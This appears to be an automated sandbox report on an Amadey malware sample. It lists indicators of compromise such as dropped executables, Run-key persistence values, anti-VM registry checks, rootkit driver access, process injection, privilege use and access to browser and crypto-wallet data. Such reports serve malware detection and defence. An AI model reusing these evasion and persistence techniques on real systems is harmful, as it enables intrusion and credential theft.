amadey | cd19c8e9270cc07872c4f7fe6b0b20751bd079ccc8bd35f6362fc4fb7a1f14ea

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	moto.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	moto.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iojmibhyhiws.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iojmibhyhiws.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	8dce9705c0c4c3f6175d0ac758a7aaad.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	explorhe.exe

Executes dropped EXE 33 IoCs

pid	Process
3044	explorhe.exe
4076	stan.exe
4812	moto.exe
4140	crypted.exe
4852	iojmibhyhiws.exe
3804	2024.exe
4768	alex.exe
4472	rdx1122.exe
4916	qemu-ga.exe
2736	leg221.exe
2324	olehps.exe
4620	powercfg.exe
4176	WerFault.exe
2876	InstallSetup7.exe
2840	MRK.exe
4320	toolspub1.exe
2408	BroomSetup.exe
1960	31839b57a4f11171d6abc8bbc4451ee4.exe
4196	rty25.exe
3024	FirstZ.exe
2712	Conhost.exe
4552	WerFault.exe
5112	explorhe.exe
3940	Conhost.exe
5244	sadsadsadsa.exe
4976	31839b57a4f11171d6abc8bbc4451ee4.exe
4520	csrss.exe
228	reakuqnanrkn.exe
2140	injector.exe
1680	windefender.exe
1352	windefender.exe
3068	explorhe.exe
5524	explorhe.exe

Loads dropped DLL 3 IoCs

pid	Process
2876	InstallSetup7.exe
2876	InstallSetup7.exe
1520	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\stan.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000609001\\stan.exe"	explorhe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs

pid	Process
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe
3044	explorhe.exe
4076	stan.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4140 set thread context of 4348	4140	crypted.exe	182
PID 4852 set thread context of 3808	4852	iojmibhyhiws.exe	108
PID 4852 set thread context of 1756	4852	iojmibhyhiws.exe	109
PID 4472 set thread context of 3768	4472	rdx1122.exe	120
PID 4768 set thread context of 2628	4768	alex.exe	306
PID 3940 set thread context of 5192	3940	Conhost.exe	145
PID 2840 set thread context of 5396	2840	MRK.exe	254
PID 228 set thread context of 5324	228	reakuqnanrkn.exe	293
PID 228 set thread context of 5328	228	reakuqnanrkn.exe	289

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3348	sc.exe
1008	sc.exe
3488	sc.exe
5512	sc.exe
4468	sc.exe
4472	sc.exe
5936	sc.exe
5788	sc.exe
5428	sc.exe
1100	sc.exe
4228	sc.exe
3144	sc.exe
456	sc.exe
5596	sc.exe
5224	sc.exe
4940	sc.exe
5732	sc.exe
4192	sc.exe
1956	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 46 IoCs

pid	pid_target	Process	procid_target
828	4320	WerFault.exe	38
3840	1960	WerFault.exe	129
4964	4552	WerFault.exe
3032	1960	WerFault.exe	129
5340	1960	WerFault.exe	129
5608	1960	WerFault.exe	129
5688	1960	WerFault.exe	129
5764	2712	WerFault.exe	133
5776	1960	WerFault.exe	129
5836	1960	WerFault.exe	129
5888	5396	WerFault.exe	147
5908	1960	WerFault.exe	129
4280	1960	WerFault.exe	129
5228	1960	WerFault.exe	129
4604	1960	WerFault.exe	129
4124	1960	WerFault.exe	129
2120	1960	WerFault.exe	129
1940	1960	WerFault.exe	129
5380	1960	WerFault.exe	129
5524	1960	WerFault.exe	129
5008	1960	WerFault.exe	129
5572	1960	WerFault.exe	129
4520	1960	WerFault.exe	129
6020	4976	WerFault.exe	202
3192	4976	WerFault.exe	202
5648	4976	WerFault.exe	202
2248	4976	WerFault.exe	202
3612	4976	WerFault.exe	202
4444	4976	WerFault.exe	202
4200	4976	WerFault.exe	202
3504	4976	WerFault.exe	202
5752	4976	WerFault.exe	202
3628	4520	WerFault.exe	232
5328	4520	WerFault.exe	232
6036	4520	WerFault.exe	232
5704	4520	WerFault.exe	232
5848	4520	WerFault.exe	232
5884	4520	WerFault.exe	232
3480	4520	WerFault.exe	232
5440	4520	WerFault.exe	232
1980	4520	WerFault.exe	232
5872	4520	WerFault.exe	232
2336	4520	WerFault.exe	232
1516	4520	WerFault.exe	232
3308	4520	WerFault.exe	232
3532	4520	WerFault.exe	232

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4608	schtasks.exe
6020	schtasks.exe
5836	schtasks.exe
5164	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2432 = "Cuba Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2941 = "Sao Tome Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2942 = "Sao Tome Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4812	moto.exe
4812	moto.exe
4812	moto.exe
4812	moto.exe
4812	moto.exe
4852	iojmibhyhiws.exe
4852	iojmibhyhiws.exe
4348	choice.exe
4348	choice.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
3804	2024.exe
3804	2024.exe
3804	2024.exe
3804	2024.exe
3804	2024.exe
3804	2024.exe
1756	conhost.exe
1756	conhost.exe
2736	leg221.exe
2736	leg221.exe
3804	2024.exe
1756	conhost.exe
1756	conhost.exe
4320	toolspub1.exe
4320	toolspub1.exe
1756	conhost.exe
1756	conhost.exe
4620	powercfg.exe
4620	powercfg.exe
1756	conhost.exe
1756	conhost.exe
3768	RegAsm.exe
3768	RegAsm.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
3768	RegAsm.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe
3768	RegAsm.exe
3768	RegAsm.exe
3768	RegAsm.exe
3768	RegAsm.exe
1756	conhost.exe
1756	conhost.exe
1756	conhost.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1756	conhost.exe
Token: SeDebugPrivilege	4348	choice.exe
Token: SeDebugPrivilege	4768	alex.exe
Token: SeDebugPrivilege	3804	2024.exe
Token: SeDebugPrivilege	2736	leg221.exe
Token: SeDebugPrivilege	2840	MRK.exe
Token: SeDebugPrivilege	4620	powercfg.exe
Token: SeDebugPrivilege	3768	RegAsm.exe
Token: SeDebugPrivilege	2324	olehps.exe
Token: SeDebugPrivilege	5192	RegAsm.exe
Token: SeDebugPrivilege	2628	powercfg.exe
Token: SeDebugPrivilege	5244	sadsadsadsa.exe
Token: SeDebugPrivilege	5592	powercfg.exe
Token: SeDebugPrivilege	1960	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeImpersonatePrivilege	1960	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeDebugPrivilege	5644	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	5264	powershell.exe
Token: SeShutdownPrivilege	5652	powercfg.exe
Token: SeCreatePagefilePrivilege	5652	powercfg.exe
Token: SeShutdownPrivilege	5592	powercfg.exe
Token: SeCreatePagefilePrivilege	5592	powercfg.exe
Token: SeShutdownPrivilege	5632	powercfg.exe
Token: SeCreatePagefilePrivilege	5632	powercfg.exe
Token: SeShutdownPrivilege	212	powercfg.exe
Token: SeCreatePagefilePrivilege	212	powercfg.exe
Token: SeDebugPrivilege	5396	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeShutdownPrivilege	4620	powercfg.exe
Token: SeCreatePagefilePrivilege	4620	powercfg.exe
Token: SeShutdownPrivilege	1116	powercfg.exe
Token: SeCreatePagefilePrivilege	1116	powercfg.exe
Token: SeShutdownPrivilege	2628	powercfg.exe
Token: SeCreatePagefilePrivilege	2628	powercfg.exe
Token: SeShutdownPrivilege	2852	powercfg.exe
Token: SeCreatePagefilePrivilege	2852	powercfg.exe
Token: SeLockMemoryPrivilege	5328	explorer.exe
Token: SeDebugPrivilege	5480	powershell.exe
Token: SeDebugPrivilege	5788	powershell.exe
Token: SeSystemEnvironmentPrivilege	4520	csrss.exe
Token: SeSecurityPrivilege	3144	sc.exe
Token: SeSecurityPrivilege	3144	sc.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1096	8dce9705c0c4c3f6175d0ac758a7aaad.exe
3044	explorhe.exe
4076	stan.exe
2408	BroomSetup.exe
5112	explorhe.exe
3068	explorhe.exe
5524	explorhe.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 3044	1096	8dce9705c0c4c3f6175d0ac758a7aaad.exe	88
PID 1096 wrote to memory of 3044	1096	8dce9705c0c4c3f6175d0ac758a7aaad.exe	88
PID 1096 wrote to memory of 3044	1096	8dce9705c0c4c3f6175d0ac758a7aaad.exe	88
PID 3044 wrote to memory of 4608	3044	explorhe.exe	216
PID 3044 wrote to memory of 4608	3044	explorhe.exe	216
PID 3044 wrote to memory of 4608	3044	explorhe.exe	216
PID 3044 wrote to memory of 4076	3044	explorhe.exe	91
PID 3044 wrote to memory of 4076	3044	explorhe.exe	91
PID 3044 wrote to memory of 4076	3044	explorhe.exe	91
PID 3044 wrote to memory of 4812	3044	explorhe.exe	96
PID 3044 wrote to memory of 4812	3044	explorhe.exe	96
PID 3044 wrote to memory of 4140	3044	explorhe.exe	97
PID 3044 wrote to memory of 4140	3044	explorhe.exe	97
PID 3044 wrote to memory of 4140	3044	explorhe.exe	97
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4140 wrote to memory of 4348	4140	crypted.exe	182
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 3808	4852	iojmibhyhiws.exe	108
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 3044 wrote to memory of 3804	3044	explorhe.exe	111
PID 3044 wrote to memory of 3804	3044	explorhe.exe	111
PID 3044 wrote to memory of 3804	3044	explorhe.exe	111
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 4392 wrote to memory of 2148	4392	cmd.exe	110
PID 4392 wrote to memory of 2148	4392	cmd.exe	110
PID 4852 wrote to memory of 1756	4852	iojmibhyhiws.exe	109
PID 3044 wrote to memory of 4768	3044	explorhe.exe	112
PID 3044 wrote to memory of 4768	3044	explorhe.exe	112
PID 3044 wrote to memory of 4768	3044	explorhe.exe	112
PID 3044 wrote to memory of 4472	3044	explorhe.exe	123
PID 3044 wrote to memory of 4472	3044	explorhe.exe	123
PID 3044 wrote to memory of 4472	3044	explorhe.exe	123
PID 4348 wrote to memory of 4916	4348	choice.exe	122
PID 4348 wrote to memory of 4916	4348	choice.exe	122
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120
PID 4472 wrote to memory of 3768	4472	rdx1122.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\8dce9705c0c4c3f6175d0ac758a7aaad.exe
"C:\Users\Admin\AppData\Local\Temp\8dce9705c0c4c3f6175d0ac758a7aaad.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
  "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
